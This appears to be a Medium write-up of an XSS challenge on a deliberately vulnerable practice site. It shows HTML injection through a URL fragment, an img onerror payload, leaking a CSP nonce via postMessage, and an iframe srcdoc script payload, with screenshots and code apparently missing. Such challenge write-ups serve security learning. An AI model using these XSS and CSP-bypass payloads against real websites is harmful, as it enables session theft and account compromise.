XSS challenge — The XSS rat & BugPoc

Let’s play a game… or maybe just pop an XSS?

Let’s start by checking out the challenge page:

Notice that the info of the card is somehow send back

Checking the source code

The ‘Pop up’ page uses the script script.js to take care of all the functionality. In the bottom of the script we cans see the following:

HTML injection

Let’s try to create a URL fragment which should hopefully make JSON.parse fail so we can reach the catch statement. Let’s also make sure it contains some HTML payload. The following fragment should do the job: ==<h1>hihi making the URL: `https://cards.buggywebsite.com/popup.html#==<h1>hihi`

https://cards.buggywebsite.com/popup.html#==<h1>hihi
https://cards.buggywebsite.com/popup.html#==<img src=x onerror=alert(1)>

XSS? No, CSP

Oh. CSP strikes again. Let’s use Google’s CSP evaluator to test this website’s CSP policy:

More source code

Let’s move along and proceed to check the loadPage function.

indexes = ["a","b","c"];result = indexIntoMultidimentionalArray(array, indexes);
//result will be:
//result = array["a"]["b"]["c"];

Time to exploit

Now that we got an understanding of what’s going on, it’s time to exploit! We already know that we should be able to receive the message sent with postMessage on our own attacker-controlled site, since the targetOrigin is set to ‘*’, but let’s test it in pratice:

Note: You need to allow the pop-up
  1. Dynamically create an XSS payload with extracted nonce
  2. Send a XSS payload in an URL fragment which will cause JSON.parse to fail and pop the sacred alert box

Iframes to the rescue

To overcome our struggle we can simply use the iframe tag and it’s beautiful attribute: srcdoc. This attribute allows us to specify HTML we want to have embedded into our very own browsing context created by the iframe tag. A payload as the following will do the job: <iframe srcdoc="<script nonce=ETRACTED_VAL>alert(origin);</script>">

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store